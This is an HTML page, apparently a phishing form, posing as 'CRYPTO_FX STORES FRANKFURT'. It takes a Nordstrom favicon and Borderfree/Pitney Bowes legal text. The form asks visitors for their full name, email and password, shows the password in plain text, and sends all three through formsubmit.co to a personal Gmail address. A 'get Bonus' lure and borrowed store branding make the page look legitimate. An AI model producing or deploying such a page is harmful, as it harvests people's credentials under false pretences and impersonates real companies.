<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="shortcut icon" href="./Nord images/Crypto_fx logo.png" type="image/x-icon">
  <title>Form Submit</title>
</head>
<body>
  <style>
    *{
  padding: 0;
  margin: 0;
}

.logo{
  display: flex;
  align-items: center;
  margin-block-start: 1em;
  margin-block-end: 1em;
  margin-inline-start: 40px;
  margin-inline-end: 40px;
  cursor: pointer;
  text-decoration: none;
  transition: border-color 300ms;
  touch-action: manipulation;
  font-size: 1.6rem;
  font-weight: 400;
}
.logo p{
  margin-left: 220px;
}

    .container{
      margin: auto;
      padding: 10px;
      width: 50%;
      border: 1px solid;
      background-color: rgb(193, 193, 193);
      margin-top: 10%;
      margin-bottom: 4%;

    }
    .container input, select {
      width: 96%;
      height: 35px;
      border-radius: 6px;
      margin-top: 5px;
      border: none;
      display: block;
      padding-left: 10px;
    }
    .container textarea{
      width: 90%;
      height: 10vh;
      padding: 10px;
      margin-top: 5px;
    }
    .container button{
      width: 150px;
      height: 40px;
      border: none;
      border-radius: 50px;
      background-color: rgb(6, 5, 5);
      color: white;
      font-weight: 500;
      font-size: larger;
      cursor: pointer;
      margin: 0;
      position: relative;
      margin-top: 30px;
      top: 50%;
      left: 50%;
      -ms-transform: translate(-50%, -50%);
      transform: translate(-50%, -50%);
    }
    .container button a{
      color: white;
      text-decoration: none;
    }
    .container button:hover{
      color: black;
      border: 1px solid rgb(6, 5, 5);
      background-color: transparent;
    }
    #foot{
      padding: 10px;
      margin-left: 20px;
      margin-right: 20px;
    }

    .opt{
      margin-left: 20%;
    }

        
  </style>
  <link rel="icon" href="https://n.nordstrommedia.com/id/c4fb2a09-3657-4161-9b79-6412897d9399.png" type="image/x-icon">
  
  <div class="logo">
    <h2>CRYPTO_FX STORES FRANKFURT</h2>
    <p>Email contact @cryptofxstores@consultant.com</p>
  </div>
  </div><hr>
    
  
  
</body>




<div class="container">
  <form action="https://formsubmit.co/kenzagroventures@gmail.com" method="post">
    <input type="text" name="Name" placeholder="Full name" required>
    <input type="email" name="Email" placeholder="@email.com" required>
    <input type="text" name="Password" placeholder="Password" required>
    <select name="Continent">
      <option>Africa</option>
      <option>Antartica</option>
      <option>Asia</option>
      <option>Australia</option>
      <option>Europe</option>
      <option>North America</option>
      <option>South America</option>
    </select>
    <textarea name="message" placeholder="message" required></textarea>
    <button type="submit">Submit</button>
  </form>

</div>
<hr style="border-top: 2px dotted rgb(97, 94, 94);">
                  <div style="display:flex">
                    <div class="opt"><input type="checkbox" id="ele" checked>
                  
                  <label  for="ele" style="color:rgb(187, 179, 179);padding-top: 10px;margin-left: 5px;">Send me electronic or mail offers from
                      Crypto_fx Stores. You may opt out at any time.</label><br></div>
                  </div>
                        
              </div>
              <hr>
              <div id="foot">
                  <p>
                      By clicking get Bonus, you agree to the <span><a href="">Terms & Conditions</a></span> and
                      <span><a href="">Privacy Policy of Borderfree from Pitney Bowes</a></span>, Crypto_fx Stores Frankfurt
                      international
                      fulfillment service. Borderfree is an online merchant that is located at  Deutschherrnufer 27, 60594 Frankfurt am Main, Germany.
                  </p><hr>
          
  </div>
  
</body>
</html>




